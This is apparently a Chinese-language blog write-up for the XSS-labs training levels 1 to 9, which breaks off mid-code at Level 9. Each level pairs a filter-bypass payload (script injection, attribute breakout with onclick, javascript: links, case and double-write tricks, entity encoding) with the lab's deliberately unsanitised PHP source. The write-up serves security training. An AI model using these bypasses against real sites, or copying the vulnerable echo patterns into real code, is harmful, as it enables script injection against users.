C3ngH's B10g
XSSWriteUp
C3ngH Lv3
  2024-02-04 10:38:07   2024-07-14 10:45:15    

XSS-labs题解

网址:https://xsslab.ting.kim

  • Level 1

    阅读源代码可以发现,name的值"test"由GET方法传递进入HTML的

    标签内,而例如

    等标签内均可插入

  1. XSS-labs题解
  • 标签内,而例如、等标签内均可插入标签来执行JavaScript恶意代码</p> <p>此处可以参考:<a class="link" href="https://blog.csdn.net/LYJ20010728/article/details/116462782" >XSS常见的触发标签<i class="fas fa-external-link-alt"></i></a></p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202143032203.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202143032203.png" alt="image-20240202143032203" ></a></p> <p><strong>答案:<code><script>alert(1)</script></code></strong></p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level2.php?keyword=test"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level1<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level1<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["name"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>欢迎用户".$str."</h2>";//这里直接进行调用,根本没有过滤</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level1.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 2</p> <p>可以尝试如Level 1的方法但是没有成功,再次查看源代码发现第一处的<>符号被html实体转义,只能从第二处进行注入,input标签不可内含script标签,故此处提前闭合input标签,构造一个新的script标签执行恶意代码。<a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/1706856310681.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/1706856310681.png" alt="1706856310681" ></a></p> <p><strong>答案:<code>">\<script>alert(1)\</script></code></strong></p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level3.php?writing=wait"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level2<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level2<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["keyword"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center></span></span><br><span class="line"><span class="meta"><form action=level2.php method=GET></span></span><br><span class="line"><span class="meta"><input name=keyword value="'.$str.'"></span></span><br><span class="line"><span class="meta"><input type=submit name=submit value="搜索"/></span></span><br><span class="line"><span class="meta"></form></span></span><br><span class="line"><span class="meta"></center>';</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level2.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 3</p> <p>如下图所示,本题过滤了<>和",经过测试发现 ’ 未被过滤,则可以在input标签内内联JavaScript代码</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202144949589.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202144949589.png" alt="img" ></a></p> <p><strong>答案:<code>' onclick='alert(1)</code></strong>,然后使用鼠标单击该输入框即可</p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level4.php?keyword=try harder!"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level3<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level3<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["keyword"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center></span></span><br><span class="line"><span class="meta"><form action=level3.php method=GET></span></span><br><span class="line"><span class="meta"><input name=keyword value='".htmlspecialchars($str)."'></span></span><br><span class="line"><span class="meta"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="meta"></form></span></span><br><span class="line"><span class="meta"></center>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level3.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 4</p> <p>与Level 3相同,注意使用的是双引号即可</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202145526384.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202145526384.png" alt="image-20240202145526384" ></a></p> <p><strong>答案:<code>" onclick="alert(1)</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level4.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str3</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level4.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str3</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 5</p> <p>本题在先前基础上过滤了关键字 on ,使得所有带on的方法都不可使用,故使用伪协议构造<a href=></p> <p><strong>若过滤是被替换为空,则可进行双写绕过,若是增加下划线等破坏原有结构则需使用其他方法绕过</strong></p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/e51d1669fc381c1c00e22113b0f8bea.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/e51d1669fc381c1c00e22113b0f8bea.png" alt="e51d1669fc381c1c00e22113b0f8bea" ></a></p> <p><strong>答案:<code>"><a href="[javascript:alert(1)](about:blank)">123</a>//</code></strong>,其中//为注释后面的内容</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level5.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str3</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level5.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str3</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 6</p> <p>本题用增加下划线的方式过滤href标签,可采用大小写绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202153331833.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202153331833.png" alt="image-20240202153331833" ></a></p> <p><strong>答案<code>"><a HREF="javascript:alert(1)">1</a>//</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level6.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str6</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level6.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str6</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 7</p> <p>本题以删除的方式过滤了href和script,可以使用双写绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154250121.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154250121.png" alt="image-20240202154250121" ></a></p> <p><strong>答案:<code>"><a HRHREFEF="javascrscriptipt:alert(1)">1</a>//</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> =<span class="title function_ invoke__">strtolower</span>( <span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">""</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">""</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">""</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">""</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">""</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level7.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str6</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level7.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str6</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 8</p> <p>本题以添加下划线和html实体编码的形式绕过了href 、<> 、script 、"等字符,我们可以采用HTML实体编码+URL编码的形式在URL中直接写入,也可以在input标签内输入HTML实体编码。input标签也会默认对Unicode进行解码,所以本题可使用编码方式绕过。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154853561.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154853561.png" alt="image-20240202154853561" ></a></p> <p>相关网站:</p> <p><a class="link" href="https://config.net.cn/tools/HtmlEncode.html" >在线Html实体编码解码<i class="fas fa-external-link-alt"></i></a></p> <p><a class="link" href="http://www.esjson.com/urlEncode.html" >在线url网址编码解码<i class="fas fa-external-link-alt"></i></a></p> <p><a class="link" href="http://www.esjson.com/unicodeEncode.html" >在线Unicode编码转换工具)<i class="fas fa-external-link-alt"></i></a></p> <p><strong>答案:<code>javaScript:alert(1)</code></strong></p> <p>即:javascript:alert(1) #HTML实体编码->URL编码</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="variable">$str7</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'"'</span>,<span class="string">'&quot'</span>,<span class="variable">$str6</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level8.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.<span class="variable">$str7</span>.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 9</p> <p>本题相较Level 8新增了网址合法性检测,经测试只需带有<a class="link" href="http://xn--zlr2ki56c6eedn6choa/" >http://即可通过检测<i class="fas fa-external-link-alt"></i></a>,可以将alert()内的字符改成http://,也可以在文末添加并使用注释符进行注释。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155310700.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155310700.png" alt="image-20240202155310700" ></a></p> <p><strong>答案:<code>javaScript:alert('http://')</code></strong></p> <p>即:javascript:alert(‘http://’)</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="variable">$str7</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'"'</span>,<span class="string">'&quot'</span>,<span class="variable">$str6</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level9.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span 